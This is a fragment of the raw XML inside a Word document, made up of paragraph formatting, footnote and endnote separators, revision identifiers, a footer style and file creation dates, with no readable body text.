    <w:p w14:paraId="14CA5A4B" w14:textId="7939784F" w:rsidR="0017728B" w:rsidRDefault="0017728B" w:rsidP="003A539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08ED11" wp14:editId="11A7AD43">
            <wp:extent cx="5943600" cy="14427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E84C" w14:textId="77777777" w:rsidR="003A5391" w:rsidRPr="006556BF" w:rsidRDefault="003A5391" w:rsidP="003A5391">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003A5391" w:rsidRPr="006556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8A08C" w14:textId="77777777" w:rsidR="00B34757" w:rsidRDefault="00B34757" w:rsidP="00FB23BD">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="381AEF71" w14:textId="77777777" w:rsidR="00B34757" w:rsidRDefault="00B34757" w:rsidP="00FB2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CFB22" w14:textId="77777777" w:rsidR="00B34757" w:rsidRDefault="00B34757" w:rsidP="00FB23BD">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="42373F3F" w14:textId="77777777" w:rsidR="00B34757" w:rsidRDefault="00B34757" w:rsidP="00FB23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73C"/>
    <w:rsid w:val="0000374B"/>
    <w:rsid w:val="00067F29"/>
    <w:rsid w:val="000F7D6F"/>
    <w:rsid w:val="001325B0"/>
    <w:rsid w:val="0017728B"/>
    <w:rsid w:val="001E2B14"/>
    <w:rsid w:val="002F0AFD"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00315099"/>
    <w:rsid w:val="003564FB"/>
    <w:rsid w:val="00387B5F"/>
    <w:rsid w:val="003A5391"/>
    <w:rsid w:val="003D05E6"/>
    <w:rsid w:val="003E7DA8"/>
    <w:rsid w:val="00407BDA"/>
    <w:rsid w:val="0047468C"/>
    <w:rsid w:val="0048427F"/>
    <w:rsid w:val="00533AA0"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="006117A1"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="006556BF"/>
    <w:rsid w:val="006B76FF"/>
    <w:rsid w:val="006E37E1"/>
    <w:rsid w:val="007733D6"/>
    <w:rsid w:val="007907EA"/>
    <w:rsid w:val="007E69F6"/>
    <w:rsid w:val="007F1AE9"/>
    <w:rsid w:val="007F446D"/>
    <w:rsid w:val="00827F8E"/>
    <w:rsid w:val="00831B1F"/>
    <w:rsid w:val="00833177"/>
    <w:rsid w:val="00890C0C"/>
    <w:rsid w:val="008B68D1"/>
    <w:rsid w:val="008C6E10"/>
    <w:rsid w:val="008E44BE"/>
    <w:rsid w:val="0093673C"/>
    <w:rsid w:val="009963A1"/>
    <w:rsid w:val="009B480E"/>
    <w:rsid w:val="00A12B1E"/>
    <w:rsid w:val="00AC0C63"/>
    <w:rsid w:val="00B34757"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BD28F1"/>
    <w:rsid w:val="00C217CF"/>
    <w:rsid w:val="00CA1898"/>
    <w:rsid w:val="00E16855"/>
    <w:rsid w:val="00F3245F"/>
    <w:rsid w:val="00F34331"/>
    <w:rsid w:val="00FB23BD"/>
    <w:rsid w:val="00FF1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43DE15"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BE22642E-FCE6-014F-ACC8-48D3865A5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FB23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23BD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FB23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23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42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-08T02:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-08T15:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>